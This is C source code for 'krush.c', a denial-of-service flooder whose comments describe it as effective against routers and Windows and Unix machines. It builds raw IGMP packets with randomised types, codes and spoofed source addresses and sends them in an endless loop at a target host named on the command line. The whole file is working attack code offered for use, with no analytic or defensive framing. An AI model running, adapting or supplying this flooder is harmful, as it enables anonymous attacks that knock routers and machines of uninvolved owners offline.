/* krush.c by eTech <eTech@ziplip.com> */
/* Thanx goes to datawar for his randip function and just all around support */
/* very effective againest routers */
/* also very effective againest windows and unix machines */
/* be kareful */

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <errno.h>
#include <netinet/igmp.h>

#define bail(on_what) {perror((char *)on_what);exit(1);}
#define rnd(range) (rand()%range)

void sendigmp(unsigned long int);
char *getrandip();


void sendigmp(unsigned long int dest_addr) {

struct igmp
        {
          struct iphdr ip;
          struct igmphdr igmp;
        } igmp;
   
	int     sd;
        struct  sockaddr_in sin;

        if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {  
			bail("Couldn't create socket"); 
		}

        sin.sin_family      = AF_INET;
        sin.sin_addr.s_addr = igmp.ip.daddr;   

        igmp.ip.ihl         = 5;
        igmp.ip.version     = 4;
        igmp.ip.tot_len     = htons(sizeof(struct iphdr) + sizeof(struct igmphdr));
        igmp.ip.frag_off    = 0;
        igmp.ip.ttl         = 255;
        igmp.ip.protocol    = IPPROTO_IGMP;
        igmp.ip.check       = 0;
        igmp.ip.daddr       = dest_addr;
        while(1){
	igmp.ip.tos         = rnd(20)+1;
	igmp.ip.id          = rnd(65535)+1;
	igmp.ip.saddr       = inet_addr(getrandip());
        igmp.igmp.type      = rnd(8)+1;
        igmp.igmp.code      = rnd(100)+1;

 
        if(sendto(sd, &igmp, ntohs(igmp.ip.tot_len), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1 ) {
	        bail("sendto"); 
	    }
   }

   close(sd);
}

/* datawar, ypout@mail.ru */
unsigned long long int rdtsc(void) {
  unsigned long long int tsc;
  unsigned long int tsc_l,tsc_h;
  __asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
  tsc=tsc_h;
  tsc=(tsc<<32)|tsc_l;
  return(tsc);
}

/* datawar, ypout@mail.ru */
char *
getrandip(void)
{
  char *newip;
  unsigned int a, b, c, d;

  newip = calloc(sizeof(char), 16);

  srand(rdtsc());

a:
  a = rand()>>23;
  if(a==0 || a==255) goto a;
b:
  b = rand()>>23;
  if(b==0 || b==255) goto b;
c:
  c = rand()>>23;
  if(c==0 || c==255) goto c;
d:
  d = rand()>>23;
  if(d==0 || d==255) goto d;

  snprintf(newip, 16, "%u.%u.%u.%u", a, b, c, d);

  return (newip);
}



int
  main(int argc, char *argv[]) 
{

struct             hostent *he;
unsigned long int  dsthost;

if(argc<2) {
      printf("krush.c by eTech\n"); 
      printf("Syntax: %s <host>\n",argv[0]); 
      exit(1);
   }

dsthost = inet_addr(argv[1]);

if (( he = gethostbyname(argv[1]) ) == NULL ){
bail("Couldn't resolve host"); 
}

printf("krush.c by eTech\n"); 
printf("\nAttacking %s with random igmp types and codes\n", argv[1]);
sendigmp(dsthost);
return(0);
}